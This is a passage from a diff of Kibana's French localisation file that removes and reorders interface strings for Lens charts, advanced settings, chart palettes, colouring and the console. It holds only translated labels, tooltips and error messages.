"Large", - "xpack.lens.pieChart.emptySizeRatioOptions.medium": "Moyenne", - "xpack.lens.pieChart.emptySizeRatioOptions.small": "Petite", - "xpack.lens.pieChart.fitInsideOnlyLabel": "À l'intérieur uniquement", - "xpack.lens.pieChart.hiddenNumbersLabel": "Masquer dans le graphique", - "xpack.lens.pieChart.labelPositionLabel": "Position", - "xpack.lens.pieChart.legendVisibility.auto": "Auto", - "xpack.lens.pieChart.legendVisibility.hide": "Masquer", - "xpack.lens.pieChart.legendVisibility.show": "Afficher", - "xpack.lens.pieChart.nestedLegendLabel": "Imbriqué", - "xpack.lens.pieChart.numberLabels": "Valeurs", - "xpack.lens.pieChart.percentDecimalsLabel": "Nombre maximal de décimales pour les pourcentages", - "xpack.lens.pieChart.showCategoriesLabel": "Intérieur ou extérieur", - "xpack.lens.pieChart.showFormatterValuesLabel": "Afficher la valeur", - "xpack.lens.pieChart.showPercentValuesLabel": "Afficher le pourcentage", - "xpack.lens.pieChart.showTreemapCategoriesLabel": "Afficher les étiquettes", - "xpack.lens.pieChart.valuesLabel": "Étiquettes", - "xpack.lens.pieChart.visualOptionsLabel": "Options visuelles", - "xpack.lens.resetLayerAriaLabel": "Réinitialiser le calque {index}", - "xpack.lens.resetVisualizationAriaLabel": "Réinitialiser la visualisation", - "xpack.lens.saveDuplicateRejectedDescription": "La confirmation d'enregistrement avec un doublon de titre a été rejetée.", - "xpack.lens.searchTitle": "Lens : créer des visualisations", - "xpack.lens.section.configPanelLabel": "Panneau de configuration", - "xpack.lens.section.dataPanelLabel": "Panneau de données", - "xpack.lens.section.workspaceLabel": "Espace de travail de visualisation", - "xpack.lens.settings.autoApply": "Appliquer automatiquement les modifications de la visualisation", - "xpack.lens.settings.title": "Paramètres Lens", - "xpack.lens.shared.AppearanceLabel": "Apparence", - "xpack.lens.shared.axisNameLabel": "Titre de l'axe", - "xpack.lens.shared.chartValueLabelVisibilityLabel": "Étiquettes", - "xpack.lens.shared.curveLabel": "Options visuelles", - "xpack.lens.shared.legend.filterForValueButtonAriaLabel": "Filtre pour la valeur", - "xpack.lens.shared.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "xpack.lens.shared.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur", - "xpack.lens.shared.legendAlignmentLabel": "Alignement", - "xpack.lens.shared.legendInsideAlignmentLabel": "Alignement", - "xpack.lens.shared.legendInsideColumnsLabel": "Nombre de colonnes", - "xpack.lens.shared.legendInsideLocationAlignmentLabel": "Alignement", - "xpack.lens.shared.legendLabel": "Légende", - "xpack.lens.shared.legendLocationBottomLeft": "En bas à gauche", - "xpack.lens.shared.legendLocationBottomRight": "En bas à droite", - "xpack.lens.shared.legendLocationLabel": "Emplacement", - "xpack.lens.shared.legendLocationTopLeft": "En haut à gauche", - "xpack.lens.shared.legendLocationTopRight": "En haut à droite", - "xpack.lens.shared.legendPositionBottom": "Bas", - "xpack.lens.shared.legendPositionLeft": "Gauche", - "xpack.lens.shared.legendPositionRight": "Droite", - "xpack.lens.shared.legendPositionTop": "Haut", - "xpack.lens.shared.legendSizeSetting.label": "Largeur de la légende", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.auto": "Auto", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.extraLarge": "Très grande", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.large": "Large", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.medium": "Moyenne", - "xpack.lens.shared.legendSizeSetting.legendSizeOptions.small": "Petite", - "xpack.lens.shared.legendVisibilityLabel": "Affichage", - "xpack.lens.shared.maxLinesLabel": "Nombre maximal de lignes", - "xpack.lens.shared.metric.appearanceLabel": "Apparence", - "xpack.lens.shared.nestedLegendLabel": "Imbriqué", - "xpack.lens.shared.overwriteAxisTitle": "Écraser le titre de l'axe", - "xpack.lens.shared.ticksPositionOptions": "Coches sur les bandes", - "xpack.lens.shared.ticksPositionOptionsTooltip": "Place les coches sur chaque bordure de bande au lieu de les répartir de manière homogène.", - "xpack.lens.shared.truncateLegend": "Tronquer le texte", - "xpack.lens.shared.valueInLegendLabel": "Afficher la valeur", - "xpack.lens.shared.valueLabelsVisibility.auto": "Masquer", - "xpack.lens.shared.valueLabelsVisibility.inside": "Afficher", - "xpack.lens.sugegstion.refreshSuggestionLabel": "Actualiser", - "xpack.lens.suggestion.refreshSuggestionTooltip": "Actualisez les suggestions en fonction de la visualisation sélectionnée.", - "xpack.lens.suggestions.applyChangesLabel": "Appliquer les modifications", - "xpack.lens.suggestions.applyChangesPrompt": "Les toutes dernières modifications doivent être appliquées pour afficher les suggestions.", - "xpack.lens.suggestions.currentVisLabel": "Visualisation en cours", - "xpack.lens.table.actionsLabel": "Afficher les actions", - "xpack.lens.table.alignment.center": "Centre", - "xpack.lens.table.alignment.label": "Alignement du texte", - "xpack.lens.table.alignment.left": "Gauche", - "xpack.lens.table.alignment.right": "Droite", - "xpack.lens.table.columnFilter.filterForValueText": "Filtre pour la colonne", - "xpack.lens.table.columnFilter.filterOutValueText": "Filtrer la colonne", - "xpack.lens.table.columnVisibilityLabel": "Masquer la colonne", - "xpack.lens.table.defaultAriaLabel": "Visualisation du tableau de données", - "xpack.lens.table.dynamicColoring.cell": "Cellule", - "xpack.lens.table.dynamicColoring.label": "Couleur par valeur", - "xpack.lens.table.dynamicColoring.none": "Aucun", - "xpack.lens.table.dynamicColoring.text": "Texte", - "xpack.lens.table.hide.hideLabel": "Masquer", - "xpack.lens.table.palettePanelContainer.back": "Retour", - "xpack.lens.table.palettePanelTitle": "Modifier la couleur", - "xpack.lens.table.resize.reset": "Réinitialiser la largeur", - "xpack.lens.table.rowHeight.auto": "Ajustement automatique", - "xpack.lens.table.rowHeight.custom": "Personnalisé", - "xpack.lens.table.rowHeight.single": "Unique", - "xpack.lens.table.sort.ascLabel": "Trier dans l'ordre croissant", - "xpack.lens.table.sort.descLabel": "Trier dans l'ordre décroissant", - "xpack.lens.table.summaryRow.average": "Moyenne", - "xpack.lens.table.summaryRow.count": "Compte de valeurs", - "xpack.lens.table.summaryRow.customlabel": "Étiquette de résumé", - "xpack.lens.table.summaryRow.label": "Ligne de résumé", - "xpack.lens.table.summaryRow.maximum": "Maximum", - "xpack.lens.table.summaryRow.minimum": "Minimum", - "xpack.lens.table.summaryRow.none": "Aucune", - "xpack.lens.table.summaryRow.sum": "Somme", - "xpack.lens.table.tableCellFilter.filterForValueAriaLabel": "Filtre pour la valeur : {cellContent}", - "xpack.lens.table.tableCellFilter.filterForValueText": "Filtrer sur la valeur", - "xpack.lens.table.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", - "xpack.lens.table.tableCellFilter.filterOutValueText": "Exclure la valeur", - "xpack.lens.table.valuesVisualOptions": "Options visuelles", - "xpack.lens.table.visualOptionsFitRowToContentLabel": "Hauteur de ligne de cellule", - "xpack.lens.table.visualOptionsHeaderRowHeightLabel": "Hauteur de ligne d’en-tête", - "xpack.lens.table.visualOptionsPaginateTable": "Paginer le tableau", - "xpack.lens.table.visualOptionsPaginateTableTooltip": "La pagination est masquée lorsqu’il y a moins de 10 éléments.", - "xpack.lens.TSVBLabel": "TSVB", - "xpack.lens.uniqueLabel": "{label} [{num}]", - "xpack.lens.unknownVisType.shortMessage": "Type de visualisation inconnu", - "xpack.lens.visTypeAlias.description": "Créez des visualisations avec notre éditeur de glisser-déposer. Basculez entre les différents types de visualisation à tout moment.", - "xpack.lens.visTypeAlias.note": "Recommandé pour la plupart des utilisateurs.", - "xpack.lens.visTypeAlias.title": "Lens", - "xpack.lens.visTypeAlias.type": "Lens", - "xpack.lens.visualizeGeoFieldMessage": "Lens ne peut pas visualiser les champs {fieldType}", - "xpack.lens.visualizeTSVBLegend": "Visualiser le graphique TSVB", - "xpack.lens.xyChart.addAnnotationsLayerLabel": "Annotations", - "xpack.lens.xyChart.addAnnotationsLayerLabelDisabledHelp": "Les annotations nécessitent un graphique temporel pour fonctionner. Ajoutez un histogramme de dates.", - "xpack.lens.xyChart.addDataLayerLabel": "Visualisation", - "xpack.lens.xyChart.addLayer": "Ajouter un calque", - "xpack.lens.xyChart.addLayerTooltip": "Utilisez plusieurs calques pour combiner les types de visualisation ou pour visualiser différentes vues de données.", - "xpack.lens.xyChart.addReferenceLineLayerLabel": "Lignes de référence", - "xpack.lens.xyChart.addReferenceLineLayerLabelDisabledHelp": "Ajouter des données pour activer le calque de référence", - "xpack.lens.xyChart.annotation.name": "Masquer l’annotation", - "xpack.lens.xyChart.annotationDate": "Date de l’annotation", - "xpack.lens.xyChart.annotationDate.from": "De", - "xpack.lens.xyChart.annotationDate.to": "À", - "xpack.lens.xyChart.appearance": "Apparence", - "xpack.lens.xyChart.applyAsRange": "Appliquer en tant que plage", - "xpack.lens.xyChart.axisExtent.custom": "Personnalisé", - "xpack.lens.xyChart.axisExtent.dataBounds": "Données", - "xpack.lens.xyChart.axisExtent.disabledDataBoundsMessage": "Seuls les graphiques linéaires peuvent être adaptés aux limites de données", - "xpack.lens.xyChart.axisExtent.full": "Plein", - "xpack.lens.xyChart.axisExtent.label": "Limites", - "xpack.lens.xyChart.axisOrientation.angled": "En angle", - "xpack.lens.xyChart.axisOrientation.horizontal": "Horizontal", - "xpack.lens.xyChart.axisOrientation.label": "Orientation", - "xpack.lens.xyChart.axisOrientation.vertical": "Vertical", - "xpack.lens.xyChart.axisSide.auto": "Auto", - "xpack.lens.xyChart.axisSide.bottom": "Bas", - "xpack.lens.xyChart.axisSide.label": "Côté de l'axe", - "xpack.lens.xyChart.axisSide.left": "Gauche", - "xpack.lens.xyChart.axisSide.right": "Droite", - "xpack.lens.xyChart.axisSide.top": "Haut", - "xpack.lens.xyChart.bottomAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe du bas est activé.", - "xpack.lens.xyChart.bottomAxisLabel": "Axe du bas", - "xpack.lens.xyChart.boundaryError": "La limite inférieure doit être plus grande que la limite supérieure", - "xpack.lens.xyChart.curveStyleLabel": "Courbes", - "xpack.lens.xyChart.defaultAnnotationLabel": "Événement", - "xpack.lens.xyChart.defaultRangeAnnotationLabel": "Plage d'événements", - "xpack.lens.xyChart.endValuesLabel": "Valeurs de fin", - "xpack.lens.xyChart.fill.above": "Au-dessus", - "xpack.lens.xyChart.fill.after": "Après", - "xpack.lens.xyChart.fill.before": "Avant", - "xpack.lens.xyChart.fill.below": "En dessous", - "xpack.lens.xyChart.fill.label": "Remplir", - "xpack.lens.xyChart.fill.none": "Aucun", - "xpack.lens.xyChart.fillOpacityLabel": "Opacité de remplissage", - "xpack.lens.xyChart.fillStyle": "Remplir", - "xpack.lens.xyChart.fillStyle.inside": "Intérieur", - "xpack.lens.xyChart.fillStyle.outside": "Extérieur", - "xpack.lens.xyChart.Gridlines": "Quadrillage", - "xpack.lens.xyChart.horizontalAxisLabel": "Axe horizontal", - "xpack.lens.xyChart.horizontalLeftAxisLabel": "Axe supérieur horizontal", - "xpack.lens.xyChart.horizontalRightAxisLabel": "Axe inférieur horizontal", - "xpack.lens.xyChart.iconSelect.alertIconLabel": "Alerte", - "xpack.lens.xyChart.iconSelect.asteriskIconLabel": "Astérisque", - "xpack.lens.xyChart.iconSelect.bellIconLabel": "Cloche", - "xpack.lens.xyChart.iconSelect.boltIconLabel": "Éclair", - "xpack.lens.xyChart.iconSelect.bugIconLabel": "Bug", - "xpack.lens.xyChart.iconSelect.circleIconLabel": "Cercle", - "xpack.lens.xyChart.iconSelect.commentIconLabel": "Commentaire", - "xpack.lens.xyChart.iconSelect.flagIconLabel": "Drapeau", - "xpack.lens.xyChart.iconSelect.heartLabel": "Cœur", - "xpack.lens.xyChart.iconSelect.mapMarkerLabel": "Repère", - "xpack.lens.xyChart.iconSelect.mapPinLabel": "Punaise", - "xpack.lens.xyChart.iconSelect.noIconLabel": "Aucun", - "xpack.lens.xyChart.iconSelect.starLabel": "Étoile", - "xpack.lens.xyChart.iconSelect.tagIconLabel": "Balise", - "xpack.lens.xyChart.iconSelect.triangleIconLabel": "Triangle", - "xpack.lens.xyChart.inclusiveZero": "Les limites doivent inclure zéro.", - "xpack.lens.xyChart.layerAnnotationsLabel": "Annotations", - "xpack.lens.xyChart.layerReferenceLineLabel": "Lignes de référence", - "xpack.lens.xyChart.leftAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe de gauche est activé.", - "xpack.lens.xyChart.leftAxisLabel": "Axe de gauche", - "xpack.lens.xyChart.legendLocation.inside": "Intérieur", - "xpack.lens.xyChart.legendLocation.outside": "Extérieur", - "xpack.lens.xyChart.legendVisibility.auto": "Auto", - "xpack.lens.xyChart.legendVisibility.hide": "Masquer", - "xpack.lens.xyChart.legendVisibility.show": "Afficher", - "xpack.lens.xyChart.lineColor.label": "Couleur", - "xpack.lens.xyChart.lineMarker.auto": "Auto", - "xpack.lens.xyChart.lineMarker.icon": "Décoration de l’icône", - "xpack.lens.xyChart.lineMarker.position": "Position de la décoration", - "xpack.lens.xyChart.lineMarker.textVisibility.name": "Nom", - "xpack.lens.xyChart.lineMarker.textVisibility.none": "Aucun", - "xpack.lens.xyChart.lineStyle.dashed": "Tirets", - "xpack.lens.xyChart.lineStyle.dotted": "Pointillé", - "xpack.lens.xyChart.lineStyle.label": "Ligne", - "xpack.lens.xyChart.lineStyle.solid": "Uni", - "xpack.lens.xyChart.markerPosition.above": "Haut", - "xpack.lens.xyChart.markerPosition.below": "Bas", - "xpack.lens.xyChart.markerPosition.left": "Gauche", - "xpack.lens.xyChart.markerPosition.right": "Droite", - "xpack.lens.xyChart.missingValuesLabel": "Valeurs manquantes", - "xpack.lens.xyChart.missingValuesLabelHelpText": "Par défaut, les graphiques en aires et en courbes masquent les blancs entre les données. Pour remplir le blanc, effectuez une sélection.", - "xpack.lens.xyChart.missingValuesStyle": "Afficher sous la forme d’une ligne pointillée", - "xpack.lens.xyChart.nestUnderRoot": "Ensemble de données entier", - "xpack.lens.xyChart.placement": "Placement", - "xpack.lens.xyChart.rightAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe de droite est activé.", - "xpack.lens.xyChart.rightAxisLabel": "Axe de droite", - "xpack.lens.xyChart.scaleLinear": "Linéaire", - "xpack.lens.xyChart.scaleLog": "Logarithmique", - "xpack.lens.xyChart.scaleSquare": "Racine carrée", - "xpack.lens.xyChart.seriesColor.auto": "Auto", - "xpack.lens.xyChart.seriesColor.label": "Couleur de la série", - "xpack.lens.xyChart.setScale": "Échelle de l'axe", - "xpack.lens.xyChart.showEnzones": "Afficher les marqueurs de données partielles", - "xpack.lens.xyChart.splitSeries": "Répartir par", - "xpack.lens.xyChart.tickLabels": "Étiquettes de graduation", - "xpack.lens.xyChart.topAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe du haut est activé.", - "xpack.lens.xyChart.topAxisLabel": "Axe du haut", - "xpack.lens.xyChart.valuesHistogramDisabledHelpText": "Ce paramètre ne peut pas être modifié dans les histogrammes.", - "xpack.lens.xyChart.valuesPercentageDisabledHelpText": "Ce paramètre ne peut pas être modifié dans les graphiques en aires à pourcentages.", - "xpack.lens.xyChart.valuesStackedDisabledHelpText": "Ce paramètre ne peut pas être modifié dans les graphiques empilés ou les graphiques à barres à pourcentages", - "xpack.lens.xyChart.verticalAxisLabel": "Axe vertical", - "xpack.lens.xyChart.verticalLeftAxisLabel": "Axe gauche vertical", - "xpack.lens.xyChart.verticalRightAxisLabel": "Axe droit vertical", - "xpack.lens.xySuggestions.asPercentageTitle": "Pourcentage", - "xpack.lens.xySuggestions.barChartTitle": "Graphique à barres", - "xpack.lens.xySuggestions.dateSuggestion": "{yTitle} sur {xTitle}", - "xpack.lens.xySuggestions.emptyAxisTitle": "(vide)", - "xpack.lens.xySuggestions.flipTitle": "Retourner", - "xpack.lens.xySuggestions.lineChartTitle": "Graphique linéaire", - "xpack.lens.xySuggestions.nonDateSuggestion": "{yTitle} de {xTitle}", - "xpack.lens.xySuggestions.stackedChartTitle": "Empilé", - "xpack.lens.xySuggestions.unstackedChartTitle": "Non empilé", - "xpack.lens.xySuggestions.yAxixConjunctionSign": " & ", - "xpack.lens.xyVisualization.areaLabel": "Zone", - "xpack.lens.xyVisualization.arrayValues": "{label} contient des valeurs de tableau. Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.xyVisualization.barGroupLabel": "Barre", - "xpack.lens.xyVisualization.barHorizontalFullLabel": "Horizontal à barres", - "xpack.lens.xyVisualization.barHorizontalLabel": "H. Barres", - "xpack.lens.xyVisualization.barLabel": "Vertical à barres", - "xpack.lens.xyVisualization.dataFailureSplitLong": "{layers, plural, one {Le calque} other {Les calques}} {layersList} {layers, plural, one {requiert} other {requièrent}} un champ pour {axis}.", - "xpack.lens.xyVisualization.dataFailureSplitShort": "{axis} manquant.", - "xpack.lens.xyVisualization.dataFailureYLong": "{layers, plural, one {Le calque} other {Les calques}} {layersList} {layers, plural, one {requiert} other {requièrent}} un champ pour {axis}.", - "xpack.lens.xyVisualization.dataFailureYShort": "{axis} manquant.", - "xpack.lens.xyVisualization.dataTypeFailureXLong": "Non-correspondance des types de données pour {axis}. Impossible de mélanger les types d'intervalle date et nombre.", - "xpack.lens.xyVisualization.dataTypeFailureXOrdinalLong": "Non-correspondance de type de données pour {axis}, utilisez une autre fonction.", - "xpack.lens.xyVisualization.dataTypeFailureXShort": "Type de données incorrect pour {axis}.", - "xpack.lens.xyVisualization.dataTypeFailureYLong": "La dimension {label} fournie pour {axis} possède un type de données incorrect. Nombre attendu mais possède {dataType}", - "xpack.lens.xyVisualization.dataTypeFailureYShort": "Type de données incorrect pour {axis}.", - "xpack.lens.xyVisualization.lineGroupLabel": "Linéaire et en aires", - "xpack.lens.xyVisualization.lineLabel": "Ligne", - "xpack.lens.xyVisualization.mixedBarHorizontalLabel": "Horizontal à barres mixte", - "xpack.lens.xyVisualization.mixedLabel": "XY mixte", - "xpack.lens.xyVisualization.stackedAreaLabel": "En aires empilées", - "xpack.lens.xyVisualization.stackedBarHorizontalFullLabel": "Horizontal à barres empilées", - "xpack.lens.xyVisualization.stackedBarHorizontalLabel": "H. À barres empilées", - "xpack.lens.xyVisualization.stackedBarLabel": "Vertical à barres empilées", - "xpack.lens.xyVisualization.stackedPercentageAreaLabel": "En aires à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarHorizontalFullLabel": "Horizontal à barres à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarHorizontalLabel": "H. À barres à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarLabel": "Vertical à barres à pourcentages", - "xpack.lens.xyVisualization.xyLabel": "XY", + "advancedSettings.field.changeImageLinkAriaLabel": "Modifier {ariaName}", + "advancedSettings.field.defaultValueText": "Valeur par défaut : {value}", + "advancedSettings.field.defaultValueTypeJsonText": "Valeur par défaut : {value}", + "advancedSettings.field.deprecationClickAreaLabel": "Cliquez ici pour afficher la documentation de déclassement pour {settingName}.", + "advancedSettings.field.resetToDefaultLinkAriaLabel": "Réinitialiser {ariaName} à la valeur par défaut", + "advancedSettings.form.countOfSettingsChanged": "{unsavedCount} {unsavedCount, plural, one {paramètre non enregistré} other {paramètres non enregistrés} }{hiddenCount, plural, =0 {masqué} other {, # masqués} }.", + "advancedSettings.form.noSearchResultText": "Aucun paramètre trouvé pour {queryText}. {clearSearch}", + "advancedSettings.form.searchResultText": "Les termes de la recherche masquent {settingsCount} paramètres {clearSearch}", + "advancedSettings.voiceAnnouncement.noSearchResultScreenReaderMessage": "Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", + "advancedSettings.voiceAnnouncement.searchResultScreenReaderMessage": "Vous avez recherché {query}. Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", "advancedSettings.advancedSettingsLabel": "Paramètres avancés", "advancedSettings.badge.readOnly.text": "Lecture seule", "advancedSettings.badge.readOnly.tooltip": "Impossible d’enregistrer les paramètres avancés", "advancedSettings.callOutCautionDescription": "Soyez prudent, ces paramètres sont destinés aux utilisateurs très avancés uniquement. Toute modification est susceptible d’entraîner des dommages importants à Kibana. Certains de ces paramètres peuvent être non documentés, non compatibles ou en version d'évaluation technique. Lorsqu’un champ dispose d’une valeur par défaut, le laisser vide entraîne l’application de cette valeur par défaut, ce qui peut ne pas être acceptable compte tenu d’autres directives de configuration. Toute suppression d'un paramètre personnalisé de la configuration de Kibana est définitive.", - "advancedSettings.callOutCautionTitle": "Attention : toute action est susceptible de provoquer des dommages.", + "advancedSettings.callOutCautionTitle": "Attention : toute action est susceptible de provoquer des dommages.", "advancedSettings.categoryNames.dashboardLabel": "Tableau de bord", "advancedSettings.categoryNames.discoverLabel": "Discover", "advancedSettings.categoryNames.generalLabel": "Général", @@ -1034,54 +103,34 @@ "advancedSettings.categoryNames.timelionLabel": "Timelion", "advancedSettings.categoryNames.visualizationsLabel": "Visualisations", "advancedSettings.categorySearchLabel": "Catégorie", - "advancedSettings.featureCatalogueTitle": "Personnalisez votre expérience Kibana : modifiez le format de date, activez le mode sombre, et bien plus encore.", - "advancedSettings.field.changeImageLinkAriaLabel": "Modifier {ariaName}", + "advancedSettings.featureCatalogueTitle": "Personnalisez votre expérience Kibana : modifiez le format de date, activez le mode sombre, et bien plus encore.", "advancedSettings.field.changeImageLinkText": "Modifier l'image", - "advancedSettings.field.codeEditorSyntaxErrorMessage": "Syntaxe JSON non valide", + "advancedSettings.field.codeEditorSyntaxErrorMessage": "Syntaxe JSON non valide", "advancedSettings.field.customSettingAriaLabel": "Paramètre personnalisé", "advancedSettings.field.customSettingTooltip": "Paramètre personnalisé", - "advancedSettings.field.defaultValueText": "Valeur par défaut : {value}", - "advancedSettings.field.defaultValueTypeJsonText": "Valeur par défaut : {value}", - "advancedSettings.field.deprecationClickAreaLabel": "Cliquez ici pour afficher la documentation de déclassement pour {settingName}.", "advancedSettings.field.helpText": "Ce paramètre est défini par le serveur Kibana et ne peut pas être modifié.", "advancedSettings.field.imageChangeErrorMessage": "Impossible d’enregistrer l'image", "advancedSettings.field.invalidIconLabel": "Non valide", "advancedSettings.field.offLabel": "Désactivé", "advancedSettings.field.onLabel": "Activé", - "advancedSettings.field.resetToDefaultLinkAriaLabel": "Réinitialiser {ariaName} à la valeur par défaut", "advancedSettings.field.resetToDefaultLinkText": "Réinitialiser à la valeur par défaut", "advancedSettings.field.settingIsUnsaved": "Le paramètre n'est actuellement pas enregistré.", "advancedSettings.field.unsavedIconLabel": "Non enregistré", "advancedSettings.form.cancelButtonLabel": "Annuler les modifications", "advancedSettings.form.clearNoSearchResultText": "(effacer la recherche)", "advancedSettings.form.clearSearchResultText": "(effacer la recherche)", - "advancedSettings.form.countOfSettingsChanged": "{unsavedCount} {unsavedCount, plural, one {paramètre non enregistré} other {paramètres non enregistrés} }{hiddenCount, plural, =0 {masqué} other {, # masqués} }.", - "advancedSettings.form.noSearchResultText": "Aucun paramètre trouvé pour {queryText}. {clearSearch}", "advancedSettings.form.requiresPageReloadToastButtonLabel": "Actualiser la page", "advancedSettings.form.requiresPageReloadToastDescription": "Un ou plusieurs paramètres nécessitent d’actualiser la page pour pouvoir prendre effet.", "advancedSettings.form.saveButtonLabel": "Enregistrer les modifications", "advancedSettings.form.saveButtonTooltipWithInvalidChanges": "Corrigez les paramètres non valides avant d'enregistrer.", "advancedSettings.form.saveErrorMessage": "Enregistrement impossible", - "advancedSettings.form.searchResultText": "Les termes de la recherche masquent {settingsCount} paramètres {clearSearch}", "advancedSettings.pageTitle": "Paramètres", "advancedSettings.searchBar.unableToParseQueryErrorMessage": "Impossible d'analyser la requête", "advancedSettings.searchBarAriaLabel": "Rechercher dans les paramètres avancés", "advancedSettings.voiceAnnouncement.ariaLabel": "Informations de résultat des paramètres avancés", - "advancedSettings.voiceAnnouncement.noSearchResultScreenReaderMessage": "Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", - "advancedSettings.voiceAnnouncement.searchResultScreenReaderMessage": "Vous avez recherché {query}. Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", - "alerts.documentationTitle": "Afficher la documentation", - "alerts.noPermissionsMessage": "Pour consulter les alertes, vous devez disposer de privilèges pour la fonctionnalité Alertes dans l'espace Kibana. Pour en savoir plus, contactez votre administrateur Kibana.", - "alerts.noPermissionsTitle": "Privilèges de fonctionnalité Kibana requis", - "autocomplete.fieldRequiredError": "Ce champ ne peut pas être vide.", - "autocomplete.invalidDateError": "Date non valide", - "autocomplete.invalidNumberError": "Nombre non valide", - "autocomplete.loadingDescription": "Chargement...", - "autocomplete.selectField": "Veuillez d'abord sélectionner un champ...", - "bfetch.disableBfetch": "Désactiver la mise en lots de requêtes", - "bfetch.disableBfetchCompression": "Désactiver la compression par lots", - "bfetch.disableBfetchCompressionDesc": "Vous pouvez désactiver la compression par lots. Cela permet de déboguer des requêtes individuelles, mais augmente la taille des réponses.", - "bfetch.disableBfetchDesc": "Désactive la mise en lot des requêtes. Cette option augmente le nombre de requêtes HTTP depuis Kibana, mais permet de les déboguer individuellement.", "charts.advancedSettings.visualization.colorMappingText": "Mappe des valeurs à des couleurs spécifiques dans les graphiques avec la palette Compatibilité.", + "charts.colorPicker.setColor.screenReaderDescription": "Définir la couleur pour la valeur {legendDataLabel}", + "charts.functions.palette.args.colorHelpText": "Les couleurs de la palette. Accepte un nom de couleur {html}, {hex}, {hsl}, {hsla}, {rgb} ou {rgba}.", "charts.advancedSettings.visualization.colorMappingTextDeprecation": "Ce paramètre est déclassé et ne sera plus compatible avec les futures versions.", "charts.advancedSettings.visualization.colorMappingTitle": "Mapping des couleurs", "charts.advancedSettings.visualization.useLegacyTimeAxis.description": "Active l'axe de temps hérité pour les graphiques dans Lens, Discover, Visualize et TSVB", @@ -1093,11 +142,9 @@ "charts.colormaps.redsText": "Rouges", "charts.colormaps.yellowToRedText": "Jaune à rouge", "charts.colorPicker.clearColor": "Réinitialiser la couleur", - "charts.colorPicker.setColor.screenReaderDescription": "Définir la couleur pour la valeur {legendDataLabel}", "charts.countText": "Décompte", - "charts.functions.palette.args.colorHelpText": "Les couleurs de la palette. Accepte un nom de couleur {html}, {hex}, {hsl}, {hsla}, {rgb} ou {rgba}.", - "charts.functions.palette.args.gradientHelpText": "Concevoir une palette de dégradés lorsque c'est possible ?", - "charts.functions.palette.args.reverseHelpText": "Inverser la palette ?", + "charts.functions.palette.args.gradientHelpText": "Concevoir une palette de dégradés lorsque c'est possible ?", + "charts.functions.palette.args.reverseHelpText": "Inverser la palette ?", "charts.functions.palette.args.stopHelpText": "La couleur à laquelle s’arrête la palette. Si utilisé, doit être associé à chaque couleur.", "charts.functions.paletteHelpText": "Crée une palette de couleurs.", "charts.functions.systemPalette.args.nameHelpText": "Nom de la palette dans la liste des palettes", @@ -1117,6 +164,7 @@ "charts.palettes.temperatureLabel": "Température", "charts.palettes.warmLabel": "Chaude", "charts.partialData.bucketTooltipText": "La plage temporelle sélectionnée n'inclut pas ce compartiment en entier. Il se peut qu'elle contienne des données partielles.", + "coloring.dynamicColoring.customPalette.rangeAriaLabel": "Gamme {index}", "coloring.dynamicColoring.customPalette.addColor": "Ajouter une couleur", "coloring.dynamicColoring.customPalette.addColorAriaLabel": "Ajouter une couleur", "coloring.dynamicColoring.customPalette.colorStopsHelpPercentage": "Les types de valeurs en pourcentage sont relatifs à la plage complète des valeurs de données disponibles.", @@ -1130,7 +178,6 @@ "coloring.dynamicColoring.customPalette.maxValuePlaceholder": "Valeur max.", "coloring.dynamicColoring.customPalette.minValuePlaceholder": "Valeur min.", "coloring.dynamicColoring.customPalette.oneColorRange": "Nécessite plus d’une couleur.", - "coloring.dynamicColoring.customPalette.rangeAriaLabel": "Gamme {index}", "coloring.dynamicColoring.customPalette.reverseColors": "Inverser les couleurs", "coloring.dynamicColoring.customPalette.selectNewColor": "Sélectionner une nouvelle couleur", "coloring.dynamicColoring.customPalette.setCustomMaxValue": "Définir une valeur minimum personnalisée", @@ -1143,6 +190,11 @@ "coloring.dynamicColoring.rangeType.label": "Type de valeur", "coloring.dynamicColoring.rangeType.number": "Numéro", "coloring.dynamicColoring.rangeType.percent": "Pourcent", + "console.helpPage.learnAboutConsoleAndQueryDslText": "Découvrez plus d'informations sur {console} et {queryDsl}", + "console.historyPage.itemOfRequestListAriaLabel": "Requête : {historyItem}", + "console.settingsPage.refreshInterval.everyNMinutesTimeInterval": "Toutes les {value} {value, plural, one {minute} other {minutes}}", + "console.variablesPage.descriptionText": "Définir les variables et les utiliser dans vos requêtes sous la forme {variable}.", + "console.variablesPage.descriptionText.variableNameText": "{variableName}", "console.autocomplete.addMethodMetaText": "méthode", "console.consoleDisplayName": "Console", "console.consoleMenu.copyAsCurlFailedMessage": "Impossible de copier la requête en tant que cURL", @@ -1154,14 +206,14 @@ "console.deprecations.proxyConfig.manualStepOneMessage": "Ouvrez le fichier de configuration kibana.yml.", "console.deprecations.proxyConfig.manualStepThreeMessage": "Configurez la connexion sécurisée entre Kibana et Elasticsearch à l'aide des paramètres \"server.ssl.*\".", "console.deprecations.proxyConfig.manualStepTwoMessage": "Supprimez le paramètre \"console.proxyConfig\".", - "console.deprecations.proxyConfigMessage": "La configuration de \"console.proxyConfig\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", + "console.deprecations.proxyConfigMessage": "La configuration de \"console.proxyConfig\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", 